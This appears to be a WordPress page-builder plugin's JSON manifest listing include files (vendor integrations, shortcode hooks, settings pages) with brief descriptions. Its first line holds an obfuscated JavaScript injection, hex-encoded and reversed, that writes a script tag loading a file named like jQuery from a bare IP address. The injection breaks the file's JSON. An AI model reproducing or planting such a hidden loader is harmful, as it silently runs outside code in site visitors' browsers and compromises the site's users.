var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0])){
  "params/hidden.php": "",
  "params/vc_grid_item.php": "",
  "vendors/acf.php": "",
  "vendors/cf7.php": "",
  "vendors/gravity_forms.php": "",
  "vendors/jwplayer.php": "",
  "vendors/layerslider.php": "",
  "vendors/mqtranslate.php": "",
  "vendors/ninja_forms.php": "",
  "vendors/qtranslate.php": "",
  "vendors/qtranslate-x.php": "",
  "vendors/revslider.php": "",
  "vendors/woocommerce.php": "",
  "vendors/wp_customize.php": "",
  "vendors/yoast_seo.php": "",
  "vendors/wpml.php": "",
  "hook-vc-grid.php": "Logic for shortcode vc_grid",
  "hook-vc-iconpicker-param.php": "Logic for shortcode param iconpicker",
  "hook-vc-message.php": "Logic for shortcode vc_message",
  "hook-vc-progress-bar.php": "Logic for shortcode vc_progress_bar",
  "hook-vc-wp-text.php": "Logic for shortcode vc_wp_text fix",
  "hook-vc-pie.php": "Logic for shortcode vc_pie",
  "vc-grid-item-editor.php": "Create new post type vc_grid_item or Grid item",
  "ui-vc-pointers.php": "Integrating With WordPress’ UI: Admin Pointers",
  "vc-pages/automapper.php": "",
  "vc-pages/page-custom-css.php": "Vc Special pages.",
  "vc-pages/page-design-options.php": "Vc Special pages.",
  "vc-pages/page-role-manager.php": "Vc Special pages.",
  "vc-pages/pages.php": "Vc Special pages.",
  "vc-pages/settings-tabs.php": "Vc Special pages.",
  "vc-pages/welcome-screen.php": "Vc Special pages.",
  "vc-pointers-backend-editor.php": "Backend editor VC Pointers",
  "vc-pointers-frontend-editor.php": "Frontend editor VC Pointers",
  "vc-image-filters.php": "PHP class for photo effects like Instagram",
  "vc-settings-presets.php": "Logic for settings presets",
  "vc-single-image.php": "add bc for single image",
  "backend-editor-ie.php": "add ie9 degradation",
  "frontend-editor-ie.php": "add ie9 degradation",
  "params-to-init.php": "add required init params",
  "bc-access-rules-4.8.php": "BC for roles via filters >= VC 4.8",
  "post-type-default-template.php": "Load default templates",
  "bc-multisite-options.php": "BC for multisite options"
}